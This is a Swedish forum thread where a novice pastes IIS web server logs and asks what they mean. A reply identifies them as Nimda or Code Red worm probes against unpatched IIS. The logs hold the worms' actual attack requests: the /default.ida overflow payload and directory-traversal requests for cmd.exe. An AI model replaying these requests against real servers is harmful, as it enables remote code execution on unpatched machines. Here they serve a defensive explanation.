January 3, 2003
217.208.52.72, -, 2003-05-10, 15:05:40, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.208.52.72, -, 2003-05-10, 15:29:12, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 72, 4201, 404, 3, GET, /scripts/root.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 20, 70, 4201, 404, 2, GET, /MSADC/root.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 80, 4201, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 80, 4201, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 117, 4201, 404, 3, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 117, 4201, 404, 3, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 97, 4201, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 97, 4201, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 97, 4201, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 97, 4201, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
217.208.52.72, -, 2003-05-10, 16:09:28, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.44.144.174, -, 2003-05-10, 16:23:26, W3SVC1, LAPPEN, 192.168.0.37, 90, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
Vad betyder allt det där? nån som strular med min webbserver är det fullt normalt? Är lite nybörjare på IIS så det vore tacksamt med vad detta betyder.
/Cyrgo
July 2, 2001
Det där är Nimda, CodeRed eller liknande. Dom letar upp opatchade windowsdatorer och försöker utnyttja kända hål i IIS-servern. Hittar dom en sådan dator så kopierar dom in sig och letar i sin tur efter nya datorer osv.
Kör man en windowsdator med opatchad IIS så betyder det att vem som helst kan köra valfritt program på din dator, även logga på din dator och göra allt!
1 Guest(s)